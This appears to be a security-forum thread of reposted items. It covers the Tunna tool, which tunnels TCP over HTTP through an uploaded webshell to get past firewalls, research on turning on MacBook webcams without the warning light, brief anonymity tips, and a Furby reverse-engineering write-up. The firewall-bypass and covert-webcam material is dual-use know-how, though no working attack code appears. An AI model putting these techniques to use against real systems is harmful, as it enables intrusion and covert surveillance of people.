Click Here for the Github Page

Sursa: xssless - Automatic XSS Payload Generator | The Hacker Blog
  8. Nytro

    Fun stuff

  9. Nytro

    Tunna

Overview

Tunna is a tool designed to bypass firewall restrictions on remote webservers. It consists of a local application (supporting Ruby and Python) and a web application (supporting ASP.NET, Java and PHP).

Description

Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

The web application file must be uploaded on the remote server. It will be used to make a local connection with services running on the remote web server or any other server in the DMZ. The local application communicates with the webshell over the HTTP protocol. It also exposes a local port for the client application to connect to. Since all external communication is done over HTTP, it is possible to bypass the filtering rules and connect to any service behind the firewall using the webserver on the other end.

Tunna framework

The Tunna framework comes with the following functionality:

- Ruby client - proxy bind: Ruby client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.
- Python client - proxy bind: Python client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.
- Metasploit integration module, which allows transparent execution of Metasploit payloads on the server
- ASP.NET remote script
- Java remote script
- PHP remote script

Author

Tunna has been developed by Nikos Vassakis.

Download: http://www.secforce.com/research/tunna_download.html

Sursa: SECFORCE :: Penetration Testing :: Research
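To make the wrapping idea concrete, here is a toy Python sketch of tunneling raw TCP bytes inside ordinary HTTP requests. This is NOT Tunna's actual wire format; the /tunnel.aspx path, the base64 framing, and the host name are invented for illustration only:

```python
import base64

# Toy illustration of the core idea behind Tunna: raw TCP bytes are wrapped
# in ordinary-looking HTTP requests so they pass a firewall that only allows
# web traffic. The webshell on the far side would unwrap the body and relay
# it to the real service (RDP, SSH, ...) behind the firewall.
def wrap_in_http(tcp_payload, host="target.example"):
    body = base64.b64encode(tcp_payload).decode()
    return ("POST /tunnel.aspx HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")

def unwrap_from_http(request):
    body = request.split("\r\n\r\n", 1)[1]
    return base64.b64decode(body)

req = wrap_in_http(b"\x05\x01\x00")  # e.g. the first bytes of a SOCKS handshake
assert unwrap_from_http(req) == b"\x05\x01\x00"
```

The real framework adds session handling, polling, and the server-side relay, but every variant of the technique reduces to this encode/decode round trip.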
10. [h=1]The Pirate Bay's Guyana Domain Goes Down[/h]

December 19th, 2013, 08:31 GMT · By Gabriela Vatu - The Pirate Bay's new domain is no longer working

The Pirate Bay has been on the run from domain to domain, changing quite a few over the past week. Only yesterday, the site left Peru and moved to the Republic of Guyana. Now, thepiratebay.gy is no longer working, although it’s uncertain if the domain was seized and the site has moved on to another location or there’s an issue with the servers.

The site’s insiders said that the easiest way to access the Pirate Bay would be via its old domains over at .SE and .ORG, which would redirect users to the newest homepage, wherever that might be. However, this doesn’t seem to be working either for now. The site’s admins said yesterday that they already had a bunch of domains set up in case they needed to leave again, mentioning that there were about 70 more domains to choose from.

Last week, Pirate Bay lost its .SX domain. From there, it moved to Ascension Island’s .AC for about a day, before going to the Peruvian domain. Yesterday, the site had to relocate to .GY. As soon as the site settles for a new domain, the blog will be updated, so check back soon.

[UPDATE] The Pirate Bay site seems to be working on the Swedish .SE domain for now, but it looks like it's impossible to download any magnet links at the moment. Most likely, the torrent site is only passing through as it seeks to settle into a new domain.

Sursa: The Pirate Bay's Guyana Domain Goes Down [UPDATE]
11. Research shows how MacBook Webcams can spy on their users without warning

By Ashkan Soltani and Timothy B. Lee
December 18 at 2:25 pm

The woman was shocked when she received two nude photos of herself by e-mail. The photos had been taken over a period of several months — without her knowledge — by the built-in camera on her laptop. Fortunately, the FBI was able to identify a suspect: her high school classmate, a man named Jared Abrahams. The FBI says it found software on Abrahams’s computer that allowed him to spy remotely on her and numerous other women. Abrahams pleaded guilty to extortion in October. The woman, identified in court papers only as C.W., later identified herself on Twitter as Miss Teen USA Cassidy Wolf. While her case was instant fodder for celebrity gossip sites, it left a serious issue unresolved. Most laptops with built-in cameras have an important privacy feature — a light that is supposed to turn on any time the camera is in use. But Wolf says she never saw the light on her laptop go on. As a result, she had no idea she was under surveillance. That wasn’t supposed to be possible. While controlling a camera remotely has long been a source of concern to privacy advocates, conventional wisdom said there was at least no way to deactivate the warning light. New evidence indicates otherwise.

Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, said in a recent story in The Washington Post that the FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years. Now research from Johns Hopkins University provides the first public confirmation that it’s possible to do just that, and demonstrates how. While the research focused on MacBook and iMac models released before 2008, the authors say similar techniques could work on more recent computers from a wide variety of vendors.
In other words, if a laptop has a built-in camera, it’s possible someone — whether the federal government or a malicious 19-year-old — could access it to spy on the user at any time.

One laptop, many chips

The built-in cameras on Apple computers were designed to prevent this, says Stephen Checkoway, a computer science professor at Johns Hopkins and a co-author of the study. “Apple went to some amount of effort to make sure that the LED would turn on whenever the camera was taking images,” Checkoway says. The 2008-era Apple products they studied had a “hardware interlock” between the camera and the light to ensure that the camera couldn’t turn on without alerting its owner.

The cameras Brocker and Checkoway studied. (Matthew Brocker and Stephen Checkoway)

But Checkoway and his co-author, Johns Hopkins graduate student Matthew Brocker, were able to get around this security feature. That’s because a modern laptop is actually several different computers in one package. “There’s more than one chip on your computer,” says Charlie Miller, a security expert at Twitter. “There’s a chip in the battery, a chip in the keyboard, a chip in the camera.”

MacBooks are designed to prevent software running on the MacBook’s central processing unit (CPU) from activating its iSight camera without turning on the light. But researchers figured out how to reprogram the chip inside the camera, known as a micro-controller, to defeat this security feature. In a paper called “iSeeYou: Disabling the MacBook Webcam Indicator LED,” Brocker and Checkoway describe how to reprogram the iSight camera’s micro-controller to allow the camera and light to be activated independently. That allows the camera to be turned on while the light stays off. Their research is under consideration for an upcoming academic security conference. The researchers also provided us with a copy of their proof-of-concept software.
In the video below, we demonstrate how the camera can be activated without triggering the telltale warning light.

Attacks that exploit microcontrollers are becoming more common. “People are starting to think about what happens when you can reprogram each of those,” Miller says. For example, he demonstrated an attack last year on the software that controls Apple batteries, which causes the battery to discharge rapidly, potentially leading to a fire or explosion. Another researcher was able to convert the built-in Apple keyboard into spyware using a similar method.

According to the researchers, the vulnerability they discovered affects “Apple internal iSight webcams found in earlier-generation Apple products, including the iMac G5 and early Intel-based iMacs, MacBooks, and MacBook Pros until roughly 2008.” While the attack outlined in the paper is limited to these devices, researchers like Charlie Miller suggest that the attack could be applicable to newer systems as well. “There’s no reason you can’t do it -- it’s just a lot of work and resources but it depends on how well [Apple] secured the hardware,” Miller says.

Apple did not reply to requests for comment. Brocker and Checkoway write in their report that they contacted the company on July 16. “Apple employees followed up several times but did not inform us of any possible mitigation plans,” the researchers write.

RATted out

The software used by Abrahams in the Wolf case is known as a Remote Administration Tool, or RAT. This software, which allows someone to control a computer from across the Internet, has legitimate purposes as well as nefarious ones. For example, it can make it easier for a school’s IT staff to administer a classroom full of computers. Indeed, the devices the researchers studied were similar to MacBooks involved in a notorious case in Pennsylvania in 2008.
In that incident, administrators at Lower Merion High School outside Philadelphia reportedly captured 56,000 images of students using the RAT installed on school-issued laptops. Students reported seeing a ‘creepy’ green flicker that indicated that the camera was in use. That helped to alert students to the issue, eventually leading to a lawsuit. But more sophisticated remote monitoring tools may already have the capabilities to suppress the warning light, says Morgan Marquis-Boire, a security researcher at the University of Toronto. He says that cheap RATs like the one used in Merion High School may not have the ability to disable the hardware LEDs, but “you would probably expect more sophisticated surveillance offerings which cost hundreds of thousands of euros” to be stealthier. He points to commercial surveillance products such as Hacking Team and FinFisher that are marketed for use by governments. FinFisher is a suite of tools sold by a European firm called the Gamma Group. A company marketing document released by WikiLeaks indicated that Finfisher could be “covertly deployed on the Target Systems” and enable, among other things, “Live Surveillance through Webcam and Microphone.” The Chinese government has also been accused of using RATs for surveillance purposes. A 2009 report from the University of Toronto described a surveillance program called Ghostnet that the Chinese government allegedly used to spy on prominent Tibetans, including the Dalai Lama. The authors reported that “web cameras are being silently triggered, and audio inputs surreptitiously activated,” though it’s not clear whether the Ghostnet software is capable of disabling camera warning lights. Luckily, there’s an easy way for users to protect themselves. “The safest thing to do is to put a piece of tape on your camera,” Miller says. Ashkan Soltani is an independent security researcher and consultant. Sursa: Research shows how MacBook Webcams can spy on their users without warning
12. So, as suggestions:

1. Disable JavaScript (temporarily)
2. Random user agent
3. Spoof MAC

Anything else?
13. Reverse Engineering a Furby

Table of Contents

Introduction
About the Device
Inter-Device Communication
Reversing the Android App
Reversing the Hardware
Dumping the EEPROM
Decapping Proprietary Chips
SEM Imaging of Decapped Chips

Introduction

This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices. After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame. Everyone laughed, and we all moved on with our lives. However, the joke didn’t stop there. Within two weeks, this same friend said they had a present for me. And that’s how I started reverse engineering a Furby.

About the Device

A Furby is an evil robotic children’s toy wrapped in colored fur. Besides speaking its own gibberish-like language called Furbish, a variety of sensors and buttons allow it to react to different kinds of stimuli. Since its original debut in 1998, the Furby apparently received a number of upgrades and new features. The specific model I looked at was from 2012, which supported communication between devices, sported LCD eyes, and even came with a mobile app.

Inter-Device Communication

As mentioned above, one feature of the 2012 version was the toy’s ability to communicate with other Furbys as well as the mobile app. However, after some investigation I realized that it didn’t use Bluetooth, RF, or any other common wireless protocols. Instead, a look at the official Hasbro Furby FAQ told a more interesting story:

Q. There is a high pitched tone coming from Furby and/or my iOS device.
A. The noise you are hearing is how Furby communicates with the mobile device and other Furbys. Some people may hear it, others will not. Some animals may also hear the noise. Don’t worry, the tone will not cause any harm to people or animals.
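The "high pitched tone" in Hasbro's answer is the data carrier. As a rough, self-contained sketch of the general technique (frequency-shift keying, where each bit selects one of two tones), the snippet below generates a data-carrying tone. The frequencies, bit timing, and framing here are made up for illustration; the real Furby protocol was reverse engineered by the Hacksby project mentioned below:

```python
import math

# Illustrative FSK encoder: each bit selects one of two tones. Frequencies
# and bit duration are invented (a plausible "mosquito tone" range), NOT the
# actual Furby/ComAir parameters.
SAMPLE_RATE = 44100
FREQ_ZERO, FREQ_ONE = 17000.0, 18000.0   # hypothetical carrier frequencies
BIT_SAMPLES = 441                        # 10 ms per bit at 44.1 kHz

def fsk_encode(bits):
    samples = []
    for bit in bits:
        freq = FREQ_ONE if bit else FREQ_ZERO
        for n in range(BIT_SAMPLES):
            samples.append(math.sin(2 * math.pi * freq * n / SAMPLE_RATE))
    return samples

tone = fsk_encode([1, 0, 1])
print(len(tone))  # 1323 samples: 3 bits x 10 ms at 44.1 kHz
```

A decoder runs the process in reverse: it measures the dominant frequency in each 10 ms window (e.g. with a Goertzel filter or FFT) and maps it back to a bit.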
Digging into this lead, I learned that Furbys in fact perform inter-device communication with an audio protocol that encodes data into bursts of high-pitch frequencies. That is, devices communicate with one another via high-pitch sound waves with a speaker and microphone. #badBIOS anyone? This was easily confirmed by use of the mobile app, which emitted a modulated sound similar to the mosquito tone whenever an item or command was sent to the Furby. The toy would also respond with a similar sound which was recorded by the phone’s microphone and decoded by the app.

Upon searching, I learned that other individuals had performed a bit of prior work in analyzing this protocol. Notably, the GitHub project Hacksby appears to have successfully reverse engineered the packet specification, developed scripts to encode and decode data, and compiled a fairly complete database of events understood by the Furby.

Reversing the Android App

Since the open source database of events is not currently complete, I decided to spend a few minutes looking at the Android app to identify how it performed its audio decoding. After grabbing the .apk via APK Downloader, it was simple work to get to the app’s juicy bits:

$ unzip -q com.hasbro.furby.apk
$ d2j-dex2jar.sh classes.dex
dex2jar classes.dex -> classes-dex2jar.jar
$

Using jd-gui, I then decompiled classes-dex2jar.jar into a set of .java source files. I skimmed through the source files of a few app features that utilized the communication protocol (e.g., Deli, Pantry, Translator) and noticed a few calls to methods named sendComAirCmd().
Each method accepted an integer as input, which was spliced and passed to objects created from the generalplus.com.GPLib.ComAirWrapper class:

private void sendComAirCmd(int paramInt)
{
    Logger.log(Deli.TAG, "sent command: " + paramInt);
    Integer localInteger1 = Integer.valueOf(paramInt);
    int i = 0x1F & localInteger1.intValue() >> 5;
    int j = 32 + (0x1F & localInteger1.intValue());

    ComAirWrapper.ComAirCommand[] arrayOfComAirCommand = new ComAirWrapper.ComAirCommand[2];
    ComAirWrapper localComAirWrapper1 = this.comairWrapper;
    localComAirWrapper1.getClass();
    arrayOfComAirCommand[0] = new ComAirWrapper.ComAirCommand(localComAirWrapper1, i, 0.5F);
    ComAirWrapper localComAirWrapper2 = this.comairWrapper;
    localComAirWrapper2.getClass();
    arrayOfComAirCommand[1] = new ComAirWrapper.ComAirCommand(localComAirWrapper2, j, 0.0F);

The name generalplus appears to identify the Taiwanese company General Plus, which “engage in the research, development, design, testing and sales of high quality, high value-added consumer integrated circuits (ICs).” I was unable to find any public information about the GPLib/ComAir library. However, a thread on /g/ from 2012 appears to have made some steps towards identifying the General Plus chip, among others.

The source code at generalplus/com/GPLib/ComAirWrapper.java defined a number of methods providing wrapper functionality around encoding and decoding data, though none of the functionality itself.
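The bit-splicing in sendComAirCmd() above can be re-implemented in a few lines of Python: the command ID is split into two 5-bit halves, each sent as its own ComAir command (splice_command is my own name for the helper, and the purpose of the 32 offset on the low half is my guess; the arithmetic itself matches the decompiled code):

```python
# Re-implementation of the splice in sendComAirCmd(): the command integer is
# split into its high and low 5-bit halves; the low half is offset by 32,
# presumably so the two halves are distinguishable on the wire.
def splice_command(param):
    i = 0x1F & (param >> 5)   # high 5 bits (Java's >> binds tighter than &)
    j = 32 + (0x1F & param)   # low 5 bits, offset by 32
    return i, j

print(splice_command(200))  # (6, 40)
```

This implies a 10-bit command space (0-1023) carried as two consecutive 5-bit audio symbols.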
Continuing to dig, I found the file libGPLibComAir.so:

$ file lib/armeabi/libGPLibComAir.so
lib/armeabi/libGPLibComAir.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped

Quick analysis on the binary showed that this was likely the code I had been looking for:

$ nm -D lib/armeabi/libGPLibComAir.so | grep -i -e encode -e decode -e command
0000787d T ComAir_GetCommand
00004231 T Java_generalplus_com_GPLib_ComAirWrapper_Decode
000045e9 T Java_generalplus_com_GPLib_ComAirWrapper_GenerateComAirCommand
00004585 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirDecodeMode
000045c9 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirEncodeMode
00004561 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirDecodeMode
000045a5 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirEncodeMode
000041f1 T Java_generalplus_com_GPLib_ComAirWrapper_StartComAirDecode
00004211 T Java_generalplus_com_GPLib_ComAirWrapper_StopComAirDecode
00005af5 T _Z13DecodeRegCodePhP15tagCustomerInfo
000058cd T _Z13EncodeRegCodethPh
00004f3d T _ZN12C_ComAirCore12DecodeBufferEPsi
00004c41 T _ZN12C_ComAirCore13GetDecodeModeEv
00004ec9 T _ZN12C_ComAirCore13GetDecodeSizeEv
00004b69 T _ZN12C_ComAirCore13SetDecodeModeE16eAudioDecodeMode
000050a1 T _ZN12C_ComAirCore16SetPlaySoundBuffEP19S_ComAirCommand_Tag
00004e05 T _ZN12C_ComAirCore6DecodeEPsi
00005445 T _ZN15C_ComAirEncoder10SetPinCodeEs
00005411 T _ZN15C_ComAirEncoder11GetiDfValueEv
0000547d T _ZN15C_ComAirEncoder11PlayCommandEi
000053fd T _ZN15C_ComAirEncoder11SetiDfValueEi
00005465 T _ZN15C_ComAirEncoder12IsCmdPlayingEv
0000588d T _ZN15C_ComAirEncoder13GetComAirDataEPPcRi
000053c9 T _ZN15C_ComAirEncoder13GetEncodeModeEv
000053b5 T _ZN15C_ComAirEncoder13SetEncodeModeE16eAudioEncodeMode
000053ed T _ZN15C_ComAirEncoder14GetCentralFreqEv
00005379 T _ZN15C_ComAirEncoder14ReleasePlayersEv
000053d9 T _ZN15C_ComAirEncoder14SetCentralFreqEi
000056c1 T _ZN15C_ComAirEncoder15GenComAirBufferEiPiPs
00005435 T _ZN15C_ComAirEncoder15GetWaveFormTypeEv
000054bd T _ZN15C_ComAirEncoder15PlayCommandListEiP20tagComAirCommandList
00005421 T _ZN15C_ComAirEncoder15SetWaveFormTypeEi
00005645 T _ZN15C_ComAirEncoder17PlayComAirCommandEif
00005755 T _ZN15C_ComAirEncoder24FillWavInfoAndPlayBufferEiPsf
00005369 T _ZN15C_ComAirEncoder4InitEv
000051f9 T _ZN15C_ComAirEncoderC1Ev
000050b9 T _ZN15C_ComAirEncoderC2Ev
00005351 T _ZN15C_ComAirEncoderD1Ev
00005339 T _ZN15C_ComAirEncoderD2Ev

I loaded the binary in IDA Pro and quickly confirmed my thought. The method generalplus.com.GPLib.ComAirWrapper.Decode() decompiled to the following function:

unsigned int __fastcall Java_generalplus_com_GPLib_ComAirWrapper_Decode(int a1, int a2, int a3)
{
  int v3; // ST0C_4@1
  int v4; // ST04_4@1
  int v5; // ST1C_4@1
  const void *v6; // ST18_4@1
  unsigned int v7; // ST14_4@1

  v3 = a1;
  v4 = a3;
  v5 = _JNIEnv::GetArrayLength();
  v6 = (const void *)_JNIEnv::GetShortArrayElements(v3, v4, 0);
  v7 = C_ComAirCore::DecodeBuffer((int)&unk_10EB0, v6, v5);
  _JNIEnv::ReleaseShortArrayElements(v3);
  return v7;
}

Within C_ComAirCore::DecodeBuffer() resided a looping call to ComAir_DecFrameProc() which appeared to be referencing some table of phase coefficients:

int __fastcall ComAir_DecFrameProc(int a1, int a2)
{
  int v2; // r5@1
  signed int v3; // r4@1
  int v4; // r0@3
  int v5; // r3@5
  signed int v6; // r2@5

  v2 = a1;
  v3 = 0x40;
  if ( ComAir_Rate_Mode != 1 )
  {
    v3 = 0x80;
    if ( ComAir_Rate_Mode == 2 )
      v3 = 0x20;
  }
  v4 = (a2 << 0xC) / 0x64;
  if ( v4 > (signed int)&PHASE_COEF[0x157F] )
    v4 = (int)&PHASE_COEF[0x157F];
  v5 = v2;
  v6 = 0;
  do
  {
    ++v6;
    *(_WORD *)v5 = (unsigned int)(*(_WORD *)v5 * v4) >> 0x10;
    v5 += 2;
  }
  while ( v3 > v6 );
  ComAirDec();
  return ComAir_GetCommand();
}

Near the end of the function was a call to the very large function ComAirDec(), which likely was decompiled with the incorrect number of arguments and performed the bulk of the audio decoding process. Data was transformed and parsed, and a number of symbols apparently associated with frequency-shift keying were referenced.
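As a sketch of what the front half of ComAir_DecFrameProc() appears to do, here is a Python re-implementation of its sample-scaling loop. This is my interpretation of the decompiled code (scale_frame is my own name, the PHASE_COEF clamp is omitted, and samples are assumed to be unsigned 16-bit values): the second argument looks like a percentage gain, converted to a 4.12 fixed-point multiplier and applied to each sample in the frame.

```python
# Interpretation of the scaling loop in ComAir_DecFrameProc(): a gain value
# (apparently a percentage) becomes a fixed-point multiplier ((gain << 12) / 100),
# and each 16-bit sample is multiplied by it, keeping the high 16 bits of the
# 32-bit product. Frame length (0x40 / 0x80 / 0x20) depends on ComAir_Rate_Mode,
# exactly as in the decompiled code.
def scale_frame(samples, gain, rate_mode=1):
    length = {1: 0x40, 2: 0x20}.get(rate_mode, 0x80)
    mult = (gain << 0xC) // 100
    return [((s * mult) >> 0x10) & 0xFFFF for s in samples[:length]]

frame = [0x1000] * 0x40
print(scale_frame(frame, 100)[0])  # 256
```

With gain = 100 the multiplier is exactly 4096 (1.0 in 4.12 fixed point scaled down by 2^4), i.e. the loop is normalizing the input level before the FSK demodulation in ComAirDec().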
Itching to continue onto reverse engineering the hardware, I began disassembling the device.

Reversing the Hardware

Actually disassembling the Furby itself proved more difficult than expected due to the form factor of the toy and number of hidden screws. Since various tear-downs of the hardware are already available online, let’s just skip ahead to extracting juicy secrets from the device.

The heart of the Furby lies in the following two-piece circuit board:

Thanks to another friend, I also had access to a second Furby 2012 model, this time the French version. Although the circuit boards of both devices were incredibly similar, differences did exist, most notably in the layout of the right-hand daughterboard. Additionally, the EEPROM chip (U2 on the board) was branded as Shenzen LIZE on the U.S. version, while the French version was branded ATMEL:

The first feature I noticed about the boards was the fact that a number of chips were hidden by a thick blob of epoxy. This is likely meant to thwart reverse engineers, as many of the important chips on the Furby are actually proprietary and designed (or at least contracted for development) by Hasbro. This is a standard PCB assembly technique known as “chip-on-board” or “direct chip attachment,” though it proves harder to identify the chips due to the lack of markings. However, one may still simply inspect the traces connected to the chip and infer its functionality from there. For now, let’s start with something more accessible and dump the exposed EEPROM.

Dumping the EEPROM

The EEPROM chip on the French version Furby is fairly standard and may be easily identified by its form and markings:

By googling the markings, we find the datasheet and learn that it is a 24Cxx family EEPROM chip manufactured by ATMEL. This particular chip provides 2048 bits of memory (256 bytes), speaks I2C, and offers a write protect pin to prevent accidental data corruption. The chip on the U.S.
version Furby has similar specs but is marked L24C02B-SI and manufactured by Shenzen LIZE. Using the same technique as on my Withings WS-30 project, I used a heat gun to desolder the chip from the board. Note that this MUST be done in a well-ventilated area. Intense, direct heat will likely scorch the board and release horrible chemicals into the air. Unlike my Withings WS-30 project, however, I no longer had access to an ISP programmer and would need to wire the EEPROM manually. I chose to use my Arduino Duemilanove since it provides an I2C interface and accompanying libraries for easy development. Referencing the datasheet, we find that there are eight total pins to deal with. Pins 1-3 (A0, A1, A2) are device address input pins and are used to assign a unique identifier to the chip. Since multiple EEPROM chips may be wired in parallel, a method must be used to identify which chip a controller wishes to speak with. By pulling the A0, A1, and A2 pins high or low, a 3-bit number is formed that uniquely identifies the chip. Since we only have one EEPROM, we can simply tie all three to ground. Likewise, pin 4 (GND) is also connected to ground. Pins 5 and 6 (SDA, SCL) designate the data and clock pins on the chip, respectively. These pins are what give “Two Wire Interface” (TWI) its name, as full communication may be achieved with just these two lines. SDA provides bi-directional serial data transfer, while SCL provides a clock signal. Pin 7 (WP) is the write protect pin and provides a means to place the chip in read-only mode. Since we have no intention of writing to the chip (we only want to read the chip without corrupting its contents), we can pull this pin high (5 volts). Note that some chips provide a “negative” WP pin; that is, connecting it to ground will enable write protection and pulling it high will disable it. Pin 8 (VCC) is also connected to the same positive power source. 
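Putting the pin-strapping scheme above into code: the 24Cxx family builds its 7-bit I2C address from a fixed 1010 prefix followed by the A2, A1, A0 bits set on pins 1-3. A small sketch (consistent with the 24Cxx datasheet; eeprom_address is my own helper name):

```python
# 24Cxx I2C addressing: 7-bit address = 0b1010 prefix + A2 A1 A0 pin levels.
# With all three address pins tied to ground, the chip answers at 0x50,
# which is why the Arduino sketch below talks to address 0x50.
def eeprom_address(a2, a1, a0):
    return 0b1010000 | (a2 << 2) | (a1 << 1) | a0

print(hex(eeprom_address(0, 0, 0)))  # 0x50
print(hex(eeprom_address(1, 1, 1)))  # 0x57
```

This also shows why up to eight such EEPROMs can share one I2C bus: the three pins give eight distinct addresses, 0x50 through 0x57.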
After some time learning the Wire library and looking at example code online, I used the following Arduino sketch to successfully dump 256 bytes of data from the French version Furby EEPROM chip:

#include <Wire.h>

#define disk1 0x50    // Address of eeprom chip

byte i2c_eeprom_read_byte( int deviceaddress, unsigned int eeaddress )
{
    byte rdata = 0x11;
    Wire.beginTransmission(deviceaddress);
    // Wire.write((int)(eeaddress >> 8));  // MSB
    Wire.write((int)(eeaddress & 0xFF));   // LSB
    Wire.endTransmission();
    Wire.requestFrom(deviceaddress, 1);
    if (Wire.available())
        rdata = Wire.read();
    return rdata;
}

void setup(void)
{
    Serial.begin(9600);
    Wire.begin();

    unsigned int i, j;
    unsigned char b;
    for ( i = 0; i < 16; i++ )
    {
        for ( j = 0; j < 16; j++ )
        {
            b = i2c_eeprom_read_byte(disk1, (i * 16) + j);
            if ( (b & 0xf0) == 0 )
                Serial.print("0");
            Serial.print(b, HEX);
            Serial.print(" ");
        }
        Serial.println();
    }
}

void loop(){}

Note that unlike most code examples online, the “MSB” line of code within i2c_eeprom_read_byte() is commented out. Since our EEPROM chip is only 256 bytes large, we are only using 8-bit memory addressing, hence writing a single address byte. Larger memory capacities require larger address spaces (9 bits, 10 bits, and so on), which require two bytes to carry all necessary address bits.
Upon running the sketch, we are presented with the following output:

2F 64 00 00 00 00 5A EB 2F 64 00 00 00 00 5A EB
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
05 00 00 04 00 00 02 18 05 00 00 04 00 00 02 18
0F 00 00 00 00 00 18 18 0F 00 00 00 00 00 18 18
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8

Unfortunately, without much guidance or further analysis of the hardware (perhaps at runtime), it is difficult to make sense of this data. By watching the contents change over time or in response to specific events, it may be possible to gain a better understanding of these few bytes.

Decapping Proprietary Chips

With few other interesting chips freely available to probe, I turned my focus to the proprietary chips hidden by epoxy. Having seen a number of online resources showcase the fun that is chip decapping, I had the urge to try it myself. Additionally, the use of corrosive acid might just solve the issue of the epoxy in itself. Luckily, with the assistance and guidance of my Chemistry professor Dr. Geoffrey Davies, I was able to utilize the lab resources of my university and decap chips in a proper and safe manner.

First, I isolated the three chips I wanted to decap (henceforth referenced as tiny, medium, and large) by desoldering their individual boards from the main circuit board. Since the large chip was directly connected to the underside of the board, I simply took a pair of shears and cut around it.
Each chip was placed in its own beaker of 70% nitric acid (HNO3) on a hot plate at 68°C. Great care was taken to ensure that absolutely no amount of HNO3 came in contact with skin or was accidentally consumed. The entire experiment took place in a fume hood which ensured that the toxic nitrogen dioxide (NO2) gas produced by the reaction was safely evacuated and not breathed in. Each sample took a different amount of time to fully decompose the epoxy, circuit board, and chip casing depending on its size. Since I was working with a lower-concentration nitric acid than professionals typically use (red/white fuming nitric acid is generally preferred), the overall process took between 1 and 3 hours.

“Medium” (left) and “Tiny” (right)

After each chip had been fully exposed and any leftover debris removed, I removed the beakers from the hot plate, let them cool, and decanted the remaining nitric acid into a waste collection beaker, leaving the decapped chips behind. A small amount of distilled water was then added to each beaker and the entirety of it poured onto filter paper. After rinsing each sample one or two more times with distilled water, the sample was then rinsed with acetone two or three times. The large chip took the longest to finish simply due to the size of the attached circuit board fragment. About 2.5 hours in, the underside of the chip had been exposed, though the epoxy blob had still not been entirely decomposed. At this point, the bonding wires for the chip (guessed to be a microcontroller) were still visible and intact: About thirty minutes later and with the addition of more nitric acid, all three samples were cleaned and ready for imaging:

SEM Imaging of Decapped Chips

The final step was to take high resolution images of each chip to learn more about its design and identify any potential manufacturer markings. Once again, I leveraged university resources and was able to make use of a Hitachi S-4800 scanning electron microscope (SEM) with great thanks to Dr.
William Fowle. Each decapped chip was placed on a double-sided adhesive attached to a sample viewing plate. A few initial experimental SEM images were taken; however, a number of artifacts were present that severely affected the image quality. To counter this, a small amount of colloidal graphite paint was added around the edges of each chip to provide a pathway to ground for the electrons. Additionally, the viewing plate was treated in a sputter coater machine where each chip was coated with 4.5nm of palladium to create a more conductive surface. After treatment, the samples were placed back in the SEM and imaged with greater success. Each chip was imaged in pieces, and each individual image was stitched together to form a single large, high resolution picture. The small and large chip overview images were shot at 5.0kV at 150x magnification, while the medium chip overview image was shot at 5.0kV at 30x magnification: Unfortunately, as can be seen in the image above, the medium chip did not appear to have been cleaned completely in its nitric acid bath. Although it is believed to be a memory storage device of some sort (by looking at optical images), it is impossible to discern any finer details from the SEM image. A number of interesting features were found during the imaging process. The marking “GHG554” may be clearly seen directly west on the small chip. Additionally, in similar font face, the marking “GFI392” may be seen on the south-east corner of the large chip: Higher zoom images were also taken of generally interesting topology on the chips. For instance, the following two images show what looks like a “cheese grater” feature on both the small and large chips: If you are familiar with any of these chips or their features, feedback would be greatly appreciated. EDIT: According to cpldcpu, thebobfoster, and Thilo, the “cheese grater” structures are likely bond pads.
Additional images taken throughout this project are available at: Flickr: mncoppola's Photostream

Tremendous thanks go out to the following people for their guidance and donation of time and resources towards this project:

Prof. Wil Robertson – College of Computer and Information Science @ NEU
Dr. Geoffrey Davies – Dept. of Chemistry & Chemical Biology @ NEU
Dr. William Fowle – Nanomaterials Instrumentation Facility @ NEU
Molly White
Kaylie DeHart

Sursa: Reverse Engineering a Furby | Michael Coppola's Blog
14. Full Disclosure: The Internet Dark Age

• Removing Governments' on-line stranglehold
• Disabling NSA/GCHQ major capabilities (BULLRUN / EDGEHILL)
• Restoring on-line privacy - immediately

by The Adversaries

Update 1 - Spread the Word

Uncovered – //NONSA//NOGCHQ//NOGOV - CC BY-ND

On September 5th 2013, Bruce Schneier wrote in The Guardian:

“The NSA also attacks network devices directly: routers, switches, firewalls, etc. Most of these devices have surveillance capabilities already built in; the trick is to surreptitiously turn them on. This is an especially fruitful avenue of attack; routers are updated less frequently, tend not to have security software installed on them, and are generally ignored as a vulnerability”.

“The NSA also devotes considerable resources to attacking endpoint computers. This kind of thing is done by its TAO – Tailored Access Operations – group. TAO has a menu of exploits it can serve up against your computer – whether you're running Windows, Mac OS, Linux, iOS, or something else – and a variety of tricks to get them on to your computer. Your anti-virus software won't detect them, and you'd have trouble finding them even if you knew where to look. These are hacker tools designed by hackers with an essentially unlimited budget. What I took away from reading the Snowden documents was that if the NSA wants in to your computer, it's in. Period”.

http://www.theguardian.com/world/2013/sep/05/nsa-how-to-remain-secure-surveillance

The evidence provided by this Full-Disclosure is the first independent, technically verifiable proof that Bruce Schneier's statements are indeed correct.
We explain how NSA/GCHQ:
